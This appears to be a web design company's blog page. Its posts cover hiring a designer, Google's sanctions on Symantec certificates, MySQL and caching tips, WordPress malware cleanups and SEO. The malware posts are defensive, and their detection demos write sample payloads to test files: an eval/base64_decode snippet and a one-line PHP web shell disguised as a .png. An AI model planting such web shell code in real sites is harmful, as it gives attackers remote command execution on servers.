Website Design in Oakville

Finding someone in Oakville who can do website design properly is surprisingly difficult. Realistically, the surrounding municipalities of Burlington, Mississauga, Port Credit, Milton, etc. face the same problem. The larger the municipality, the more so-called designers are available to design your website. Almost every one of our clients has had a “nightmare” story about a web designer gone rogue. The industry, like any other, is unfortunately filled with subpar designers. You would think that tenure/experience would be a factor, but that is not the case. We have had to fix websites put together by companies that have been in business for well over 10 years. The purpose of this article is to help you choose a web designer for your business. If you follow the process below, you will hopefully find a person with the proper skills to fit the bill.

Burlington, Oakville, Milton, Port Credit, Mississauga

Step 1. The Search:

The first step is finding someone to build a website for you. The Yellow Pages (print) and newspaper ads are traditional ways someone might seek out a web designer. Google Search has now become the easiest way to locate a business to do the work for you. The problem with Google Search is that both “good” and “bad” designers will be listed there. How do you sift through them? One suggested method is Google Reviews, but those can be faked as well. The most effective due diligence you can do is to call a designer you found on Google Search and ask them to provide references (names and phone numbers) from the Google Reviews they have received. This effectively addresses two issues: 1) they will have names/phone numbers of people who can vouch for them; 2) they will prove that the Google Reviews listed are not faked and that they are an ethical design company. Your background research on the individual you want to hire can then be finalized with a few telephone calls.

 

Google Search

Step 2. Retainer/Deposit:

You have found a designer you want to build your website. Email all the requirements for your project and ask for a detailed quote. Avoid any quote that contains only a single line item such as “Website” and a “Grand total.” Treat the quote almost as a contract for what you will receive once the project is complete. Every requirement you requested via email should appear somewhere on the quote. Also, make sure there is a completion date.

Bad Quote

Realistically, you should receive a detailed quote within 2-3 business days. If the price is one you can work with, I suggest meeting with the designer to put down a retainer/deposit. Deposits can vary anywhere between 10% and 60% of the entire cost. Avoid anything above 60%.

If it’s a large project, make sure to get a contract in place. This article is intended as guidance for projects of $10,000.00 and less; for anything higher, you should have a contract put together. For this second step, I suggest physically meeting with the designer. I would completely avoid any designer who has a hard time meeting with you. Once you meet, go over the quote and provide payment. I would avoid cash; get a paper trail, especially if the designer did not come from a word-of-mouth referral.

Step 3. Completion:

After the deposit has been paid, the next step is patience. The hope is that the designer will complete the project on time. When the project has been completed, do not pay the rest of the invoice until you are happy with the outcome. If you are truly happy with the way the site looks and functions, then feel free to pay the remaining amount owing.

The steps above are how the entire transaction should usually proceed. We can assure you that we follow the process above. Have a look at our Website Design section or simply Contact Us if you are interested in our services.

Google disciplines Symantec for mis-issuing 30,000 Certs

In a stinging rebuke of one of the largest providers of HTTPS credentials, Google Chrome developers announced plans to drastically restrict transport layer security certificates sold by Symantec-owned issuers following the discovery that they have allegedly mis-issued more than 30,000 certificates.

Chrome plans to stop recognizing the extended validation status of all certificates issued by Symantec-owned certificate authorities, Ryan Sleevi, a software engineer on the Google Chrome team, said in an online forum. Extended validation certificates are supposed to provide enhanced assurances of a site’s authenticity by displaying the name of the validated domain name holder in the address bar. Under the move announced by Sleevi, Chrome will immediately stop displaying that information for a period of at least a year. In effect, the certificates will be downgraded to less-secure domain-validated certificates.

More gradually, Google plans to update Chrome to effectively nullify all currently valid certificates issued by Symantec-owned CAs. With Symantec certificates representing more than 30 percent of the Internet’s valid certificates by volume in 2015, the move has the potential to prevent millions of Chrome users from being able to access large numbers of sites. What’s more, Sleevi cited Firefox data showing that Symantec-issued certificates are responsible for 42 percent of all certificate validations. To minimize the chances of disruption, Chrome will stagger the mass nullification in a way that requires certificates to be replaced over time. To do this, Chrome will gradually decrease the “maximum age” of Symantec-issued certificates over a series of releases. Chrome 59 will limit expiration to no more than 33 months after issuance. By Chrome 64, validity would be limited to nine months.

The announcement is only the latest development in Google’s 18-month critique of practices by Symantec issuers. In October 2015, Symantec fired an undisclosed number of employees responsible for issuing test certificates for third-party domains without the permission of the domain holders. One of the extended-validation certificates covered google.com and www.google.com and would have given the person possessing it the ability to cryptographically impersonate those two addresses. A month later, Google pressured Symantec into performing a costly audit of its certificate issuance process after finding that the mis-issuances went well beyond what Symantec had first disclosed.

In January 2017, an independent security researcher unearthed evidence that Symantec improperly issued 108 new certificates. Thursday’s announcement came after Google’s investigation revealed that, over a span of years, Symantec CAs improperly issued more than 30,000 certificates. Such mis-issued certificates represent a potentially significant threat to virtually the entire Internet population because they make it possible for the holders to cryptographically impersonate the affected sites and monitor communications sent to and from the legitimate servers. They are a major violation of the so-called baseline requirements that major browser makers impose on CAs as a condition of being trusted.
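You can inspect the issuer and validity fields of a certificate yourself with OpenSSL. The sketch below (file paths and the subject name are placeholders, not from the article) generates a throwaway self-signed certificate and then prints the same issuer and expiry fields browsers examine when deciding whether to trust a site:

```shell
# Generate a disposable self-signed certificate. In the real world a CA
# such as Symantec would sign the certificate after validating that the
# requester controls the domain -- the step at issue in this story.
openssl req -x509 -newkey rsa:2048 -nodes \
  -keyout /tmp/key.pem -out /tmp/cert.pem \
  -days 30 -subj "/CN=example.test/O=Example Org"

# Print who issued the certificate and when it expires.
openssl x509 -in /tmp/cert.pem -noout -issuer -enddate
```

For a self-signed certificate the issuer equals the subject; for a real site you would see the CA's name there instead.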

Mr. Sleevi wrote:

As captured in Chrome’s Root Certificate Policy, root certificate authorities are expected to perform a number of critical functions commensurate with the trust granted to them. This includes properly ensuring that domain control validation is performed for server certificates, to audit logs frequently for evidence of unauthorized issuance, and to protect their infrastructure in order to minimize the ability for the issuance of fraudulent certs.
On the basis of the details publicly provided by Symantec, we do not believe that they have properly upheld these principles, and as such, have created significant risk for Google Chrome users. Symantec allowed at least four parties access to their infrastructure in a way to cause certificate issuance, did not sufficiently oversee these capabilities as required and expected, and when presented with evidence of these organizations’ failure to abide to the appropriate standard of care, failed to disclose such information in a timely manner or to identify the significance of the issues reported to them.

These issues, and the corresponding failure of appropriate oversight, spanned a period of several years, and were trivially identifiable from the information publicly available or that Symantec shared.

The full disclosure of these issues has taken more than a month. Symantec has failed to provide timely updates to the community regarding these issues. Despite having knowledge of these issues, Symantec has repeatedly failed to proactively disclose them. Further, even after issues have become public, Symantec failed to provide the information that the community required to assess the significance of these issues until they had been specifically questioned. The proposed remediation steps offered by Symantec have involved relying on known-problematic information or using practices insufficient to provide the level of assurance required under the Baseline Requirements and expected by the Chrome Root CA Policy.

Symantec officials released an email statement:

As the world’s leading cyber security company and the market leading Certificate Authority, we understand the importance of the trust chain we provide for our customers and everyone who uses the Internet. We learned of Google’s proposal when they posted it on their blog today. Their communication was unexpected and their proposed action is irresponsible. Our SSL/TLS certificate customers and partners need to know that this does not require any action at this time.

Symantec’s repeated violations underscore one of the problems Google and others face in enforcing the terms of the baseline requirements. When violations are committed by issuers with a sufficiently large market share, they are considered too big to fail. If Google were to nullify all Symantec-issued certificates overnight, it would cause widespread outages. The penalties outlined by Sleevi appear to be aimed at minimizing such disruptions while still exacting a meaningful punishment.

The penalties immediately revoke only the extended validation status of certificates issued by Symantec, a move that is likely to be a major annoyance to many Symantec customers and their site visitors, but will not make sites unavailable. The untrusting of all Symantec certificates, meanwhile, has a much higher potential to create Web-wide problems.

As Sleevi explained it: “By phasing such changes in over a series of releases, we aim to minimize the impact any given release poses, while still continually making progress towards restoring the necessary level of security to ensure Symantec-issued certificates are as trustworthy as certificates from other CAs.”

Update: Symantec has released additional information on their Blog.

Our customers don’t have to worry about the SSL issues you see above. We have always used Comodo SSL certificates.

Run OPTIMIZE TABLE to defragment tables for better performance

If you are noticing sluggish performance with your MySQL database, this simple tutorial is for you. It is particularly important for websites with a large MySQL database. Please note that you must have root access and SSH access to proceed. Log into your web host via SSH and follow the steps below.

Run this command:

Code:

mysqlcheck -u root --auto-repair --optimize --all-databases

If you notice issues you can fix tables by issuing:

Code:

mysqlcheck -A -r -p

If everything has been fixed it is highly recommended to restart your MySQL server:

/etc/init.d/mysql restart

That is all. You should see faster MySQL queries and, of course, better overall performance.
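If the optimization helps, you can schedule it to run regularly. A hypothetical weekly crontab entry is sketched below; it assumes the MySQL credentials live in the root user's ~/.my.cnf (which mysqlcheck reads by default), so the password never appears on the command line:

```
# Every Sunday at 03:00, repair and optimize all databases.
# Assumes credentials are stored in ~/.my.cnf.
0 3 * * 0 mysqlcheck --auto-repair --optimize --all-databases
```

Pick a low-traffic window, since OPTIMIZE TABLE can lock tables while it runs.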

How to leverage browser caching

What is browser caching?

Every time a browser loads a webpage it has to download all the web files to properly display the page. This includes all the HTML, CSS, JavaScript and images.

Some pages might only consist of a few files and be small in size – maybe a couple of kilobytes. For others however there may be a lot of files, and these may add up to be several megabytes large. Twitter.com for example is 3 MB+.

The issue is twofold.

First, these large files take longer to load, which can be especially painful if you’re on a slow internet connection (or a mobile device). Second, each file requires a separate request to the server; the more simultaneous requests your server receives, the more work it has to do, further reducing your page speed.

Browser caching can help by storing some of these files locally in the user’s browser. The first visit to your site will take the same time to load; however, when that user revisits your website, refreshes the page, or even moves to a different page of your site, they already have some of the needed files locally.

This means the user’s browser has to download less data, and fewer requests are made to your server. The result? Decreased page load times.

Here’s something you can add to your Apache .htaccess file to see if it improves loading times:

 

##EXPIRES CACHING
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType image/jpg "access plus 1 month"
ExpiresByType image/jpeg "access plus 1 month"
ExpiresByType image/gif "access plus 1 month"
ExpiresByType image/png "access plus 1 month"
ExpiresByType text/css "access plus 1 month"
ExpiresByType application/pdf "access plus 1 month"
ExpiresByType text/x-javascript "access plus 1 month"
ExpiresByType application/javascript "access plus 1 month"
ExpiresByType image/x-icon "access plus 1 year"
ExpiresDefault "access plus 1 week"
</IfModule>
##EXPIRES CACHING

Let us know what you think!

EDIT: It’s actually ##EXPIRES CACHING; there is no need for a # after CACHING.
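As a complementary sketch (not part of the original snippet), modern browsers also honor the Cache-Control header, which you can set via mod_headers. The extensions below mirror the types in the Expires block, and the max-age value (2592000 seconds = 30 days) is an assumption you should tune for your site:

```
##CACHE-CONTROL HEADERS
<IfModule mod_headers.c>
<FilesMatch "\.(jpg|jpeg|gif|png|css|js|pdf)$">
Header set Cache-Control "public, max-age=2592000"
</FilesMatch>
</IfModule>
##CACHE-CONTROL HEADERS
```

When both headers are present, Cache-Control takes precedence on clients that support it.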

WordPress Malware (PHP.Trojan.Uploader & Php.Trojan.StopPost)

WordPress as a platform is fantastic, and it is usually fairly secure. However, the plugins you use might be a different story. Some plugins are updated on a weekly basis, while others are updated monthly, annually, or sometimes never again.

One of our clients runs a very active and informative website. The client had refused to do any updates out of fear that updating might “break” something on the website, which is totally understandable. For those of you who do updates on a daily basis, the process is sometimes not smooth, and you end up spending more time troubleshooting than anything else.

The client was hosted on a shared web server, and our firewall alerted us that the website had been sending a large amount of spam, approximately 200-300 emails per minute. We immediately disabled the website and ran a scan on the entire server.

As it turns out, the website had been compromised via a plugin, and the injected code was using the server’s mail resources to send the spam. Upon further investigation, the server itself had not been compromised, just the client’s website.

Here’s the complete log of what had been infected:

{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-includes/ID3/header.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-includes/images/smilies/options.php.suspected
{HEX}php.base64.v23au.184 : /home/user/web/website.com/public_htmlx/wp-includes/images/wlw/object.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/themes/twentyfourteen/inc/inc.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/uploads/2015/ajax.php.suspected
{HEX}php.cmdshell.unclassed.358 : /home/user/web/website.com/public_htmlx/wp-content/uploads/phpini.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/tinymce-advanced/css/test.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/eventON/assets/js/javascript.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/eventON/assets/css/test.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/display-widgets/session.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/shortcodes-ultimate/inc/core/general.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/shortcodes-ultimate/assets/images/player/view.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/business-directory-plugin/vendors/anet_php_sdk/lib/ssl/include.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/business-directory/business-directory-plugin/vendors/anet_php_sdk/tests/AuthorizeNetDPM_Test.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/model.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/service/Google_BatchRequest.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/class-api-libs.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/samples/sample-theme-functions.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/stop-auto-update/dump.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/search.php.suspected
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/validation/object.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/css.php
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_album/module.nextgen_basic_album.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_pagination/view.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/fs/package.module.fs.php
{CAV}PHP.Trojan.Uploader : /home/user/web/website.com/public_htmlx/wp-content/plugins/seo-image/javascripts/css.php.suspected
{CAV}Php.Trojan.StopPost : /home/user/web/website.com/public_htmlx/wp-content/gallery/gal1/thumbs/ajax.php.suspected

Unfortunately, the best we could do was restore from a previous backup and then update the plugins along with WordPress itself.

The moral of the story: update your plugins, people. And if a plugin is old and no longer maintained, we wouldn’t recommend using it.
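A quick first-pass check you can run yourself over SSH is to grep the WordPress tree for constructs this kind of injected code almost always uses, such as eval() on decoded payloads. This is only a sketch: the wp-content path and demo files below are placeholders, and a hit is a candidate for manual review, not proof of infection (some legitimate plugins use these functions too).

```shell
# Demo setup: a tiny wp-content tree with one injected file.
# In real use, skip this and point the grep at your actual WordPress root.
mkdir -p /tmp/wp-demo/wp-content/plugins
printf '<?php eval(base64_decode("cGhwaW5mbygpOw=="));' \
  > /tmp/wp-demo/wp-content/plugins/injected.php
printf '<?php echo "clean";' > /tmp/wp-demo/wp-content/plugins/clean.php

# List PHP files that call eval() or base64_decode() -- common in
# injected mailer/spam code, rarer in legitimate plugin files.
cd /tmp/wp-demo
grep -rIlE --include='*.php' 'eval\(|base64_decode\(' wp-content/
```

Anything the scan flags should be diffed against a fresh copy of the plugin before deleting.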

Spam Links showing up in WordPress

I was contacted by a client who had experienced odd links/advertisements showing up in his WordPress setup. Furthermore, he had experienced emails bouncing back from his Contact Us form. The client has a dedicated server with 5 IP addresses. The other websites were not experiencing any issues, nor were the other 4 IP addresses, so the odds were that his entire server had not been compromised.

Upon examining the infected website, it appeared that the majority of the links traced back to http://www.genericstts.com. Some of the keywords used in the links were: Play Craps Online, Play Bingo Online, and Meilleurs Casino en ligne.

This was a two-part task: first, we needed to find out why his dedicated server had been blacklisted, and second, we needed to find out what was causing the links/advertisements.

There was no point in trying to get his IP address removed from the blacklist until we solved the website spam problem.

The obvious first step was to determine whether a plugin, the theme, or the WordPress core itself had been compromised. After narrowing it down, it turned out to be a plugin.

This is where you need to make a decision: do you wipe the entire system, delete just the plugin, or trace the issue and try to eliminate the malware manually, keeping the plugin and the website intact? It all depends on how much information you have stored in your WordPress setup, how much time you want to spend, and how much money you are willing to pay someone to narrow down the problem. The client wanted to trace the issue. According to Fox-IT, the proper solution would be to eliminate the compromised user and wipe the system.

Now you can try and install clamav or maldet to see if it will find the malware and remove it for you, or you can try to find the issue manually.

I did it manually. Since I knew which plugin was infected, I took a look at each file by hand. As it turned out, a .PNG file was infected, and it had dropped itself in two different spots. After getting rid of the two .PNG files, I also made sure those two directories were no longer writable.

After getting rid of the malware, I went to de-list the blacklisted IP.

All was back to normal.
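Since the dropper here hid inside .PNG files, one way to spot this class of infection is to ask `file` for the real type of every .png and flag anything that is not actually image data. The sketch below uses a throwaway demo directory; in real use you would run the find against your actual wp-content:

```shell
# Demo setup: one PHP payload disguised as a .png (a placeholder,
# not the actual file from this incident).
mkdir -p /tmp/png-demo/wp-content/uploads
printf '<?php system($_GET["c"]); ?>' \
  > /tmp/png-demo/wp-content/uploads/fake.png

# A genuine PNG reports an image/* MIME type; a renamed PHP payload
# shows up as text/x-php or text/plain instead.
cd /tmp/png-demo
find wp-content -name '*.png' -exec file --mime-type {} + | grep -v ': image/'
```

The same trick works for other image extensions attackers favor (.gif, .ico), since the web server never inspects the bytes behind the name.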

If you require any sort of malware removal on your dedicated (or shared) server, CONTACT US

 

Web Search Results Required

Clients have approached me on countless occasions wanting web search results over actual web design/development. Website owners would rather keep their outdated content, old layout, old infrastructure, and old coding, and still expect Search Engine Optimization to place them number 1 in Google’s search index.

The problem with that assumption is that Google updates its search algorithm monthly, if not weekly (possibly daily). The algorithm is constantly evolving, incorporating the latest technologies, trends, and social data. More importantly, Google’s main search priority is the actual content/information. In simple terms, if your content is 5 years old, spending your budget on Search Engine Optimization (SEO) won’t be significant enough for Google to care.

CONTENT IS KEY

PRO TIP: Before attacking SEO, consider changing and/or updating your website’s content. Google likes updated content, coding, and technology.